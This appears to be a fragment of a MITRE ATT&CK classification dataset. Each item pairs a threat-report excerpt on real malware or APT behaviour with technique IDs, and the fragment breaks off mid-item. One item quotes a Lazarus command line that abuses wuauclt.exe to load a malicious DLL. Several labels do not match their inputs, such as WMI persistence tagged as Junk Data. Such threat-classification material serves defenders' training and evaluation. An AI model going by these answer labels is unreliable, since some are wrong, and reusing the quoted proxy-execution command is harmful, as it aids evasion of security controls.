"You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host\u2019s C drive", + "output": "- T1611: Escape to Host" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) - zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt - txt is uploaded to the control server", + "output": "- T1560: Archive Collected Data\n- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks . Get Free Account . Join Now . Introduction . TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers. The uniqueness of the recent attack observed by Intezer is the group abuses a legitimate open source tool called Weave Scope to gain full control over the victim\u2019s cloud infrastructure. By installing a legitimate tool such as Weave Scope the attackers reap all the benefits as if they had installed a backdoor on the server, with significantly less effort and without needing to use malware. To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. Once installed, the attackers can connect to the Weave Scope dashboard via HTTP on port 4040 and gain full visibility and control over the victim\u2019s infrastructure. To protect yourself from this attack we recommend to: - Close exposed Docker API ports: This attack takes advantage of a common misconfiguration of the Docker API which gives the attacker full control over the Docker service. Therefore, Docker API ports should be closed or contain restricted access policies in the firewall. Block incoming connections to port 4040: Weave Scope uses default port 4040 to make the dashboard accessible and anyone with access to the network can view the dashboard. Update from Weave Works . Weave Works has since provided this in-depth article on how to prevent malicious attacks using Weave Scope", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. Also implement strict security controls for privileged accounts such as Active Directory administrator to prevent access by an unauthorized user", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 \u2014 a technique also used by SeaDuke \u2014 although this persistence mechanism is not exclusive to COZY BEAR.5", + "output": "- T1001.001: Data Obfuscation - Junk Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To avoid being run in sandboxes and emulators, all MegaCortex versions implement file encryption threading based on querying for the number of CPUs in the system. All MegaCortex versions can detect if the binary is running with administrator privileges", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Before being hashed, the character \u201c0\u201d or \u201c1\u201d is appended to the return value indicating root privileges. This clientID is stored in /Library/Storage/File System/HFS/25cf5d02-e50b-4288-870a-528d56c3cf6e/pivtoken.appex if the code runs as root, or in ~/Library/SmartCardsServices/Technology/PlugIns/drivers/snippets.ecgML otherwise. This file is normally hidden via the _chflags function and its timestamp is modified using the \u201ctouch \u2013t\u201d command with a random value", + "output": "- T1070.006: Indicator Removal - Timestomp" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIVEHANDS can receive a CLI argument for a path, this limits the ransomware's file encryption activities to the specified directory. DEATHRANSOM and HELLOKITTY do not accept CLI arguments", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However the application is not a service of Yahoo or a legitimate product of McAfee, but a rogue application used by Pawn Storm. Clicking on the \u201cAgree\u201d button would give Pawn Storm an OAuth token and access to the targets\u2019 mailbox. The group then gains access to the mailbox until the token gets revoked by the service provider or the target", + "output": "- T1550.001: Use Alternate Authentication Material - Application Access Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call exported function begins by creating a named event named \u2018RunOnce\u2019. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted", + "output": "- T1087.001: Account Discovery - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script \u201csymantec_help.jsp\u201d contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"This file is a USB file stealer which can be also guessed by its internal name \"\"USBgrabber.dll\"\". However, the implementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB drive was connected\"", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"Office Test\"\" persistence mechanism allows threat actors to execute a Trojan each time a user runs any of the Office applications. This persistence mechanism loads a malicious DLL by leveraging a registry key that appears to be used during the development and testing of Microsoft Office applications. The use of this registry key for persistence is quite clever, as it requires user interaction to load and execute the malicious payload, which makes automated analysis in sandboxes challenging. Low awareness of this persistence method, coupled with the sandbox evasion obtained from user interactions, makes this a potentially attractive persistence method that we believe may be used in future attacks. Unit 42 suggests monitoring for systems that have this registry key already created, as it is possible a threat is already using the key for persistence purposes. Microsoft has added the \u201cOffice Test\u201d registry keys to its Autoruns tool for detection purposes as well. Also, we suggest disabling this persistence method by creating the \u201cOffice test\u201d registry key in read-only mode as outlined in this blog\"", + "output": "- T1137.002: Office Application Startup - Office Test" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. If the switch associated with the execution of Stage 3 was passed to the 'pre_logic' function at the beginning of this stage, the Stage 3 payload will then be executed immediately", + "output": "- T1564.004: Hide Artifacts - NTFS File Attributes" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw", + "output": "- T1220: XSL Script Processing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) \u201cKernelInjector\u201d subsystem, also named by its developer \u2013 Standart \u2013 WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution", + "output": "- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The lnk file (WindowsUpdateConf.lnk) executes \u201cC:\\Windows\\system32\\wuauclt.exe\u201d /UpdateDeploymentProvider C:\\W\u00edndows\\system32\\wuaueng.dll /RunHandlerComServer. This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms", + "output": "- T1218: System Binary Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. Instead of using wget the attackers are distributing custom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed remote access implant", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT. The email subject was in Arabic, which translated to \u201cBusiness continuity management training\u201d. The email was sent to an address belonging to a user group, rather than a specific individual\u2019s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This function converts the given domain to \u201cbackdoor\u201d, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor", + "output": "- T1484: Domain or Tenant Policy Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We believe that the injected script came from the Andariel group since the code has similar obfuscation and structure to the sample we previously found from them. The script was used to collect information from visitors\u2019 browser: browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects", + "output": "- T1592.002: Gather Victim Host Information - Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As you can see from the VBScript file, the commands in the script are invoked using the wscript shell. It does two things: it creates a \u201cRunOnce\u201d key in the registry so that the VBScript is executed each time the user logs on the machine (indicating persistence) and second, the VBScript runs the executable file \u201cfirefox.exe", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Modify the shortcut that launches Telegram by replacing its path to the one corresponding to \u2018exe\u2019, as outlined below", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1518: Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc. to the C2", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install\u202fLookBack\u00a0malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file\u202fTemptcm.tmp,\u202fwhich is a version of certutil.exe,\u202fis dropped to decode the PEM files using\u202fTemptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of\u202fLookBack\u202fmalware", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim\u2019s machine. The path to the log file is hard-coded in the payload file, as shown here", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Here, we show an example of a PDF campaign as seen from the point of view of the affected user. This malicious PDF only contains a URL to entice the user to view the file. If the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. Browser redirection Finally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. Malicious Word document The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. Decoy document opened in Word", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While the logo and commands are identical to the original hacktool, the name was changed to OrangeTeghal. To evade security software while deploying this tool on compromised systems, the attackers use a technique revealed at Black Hat EU \u201817 in the presentation Lost in Transaction: Process Doppelg\u00e4nging. Process Doppelg\u00e4nging uses NTFS transactions to modify the executable of a seemingly benign process that is suspended right after creation", + "output": "- T1055.013: Process Injection - Process Doppelg\u00e4nging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Talos has identified two different infection vectors associated with this particular campaign. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. In the first scenario, Talos discovered a document named \"\"MinutesofMeeting-2May19.docx\"\", that appeared to display the national flag of Jordan\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of\u00a0common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The 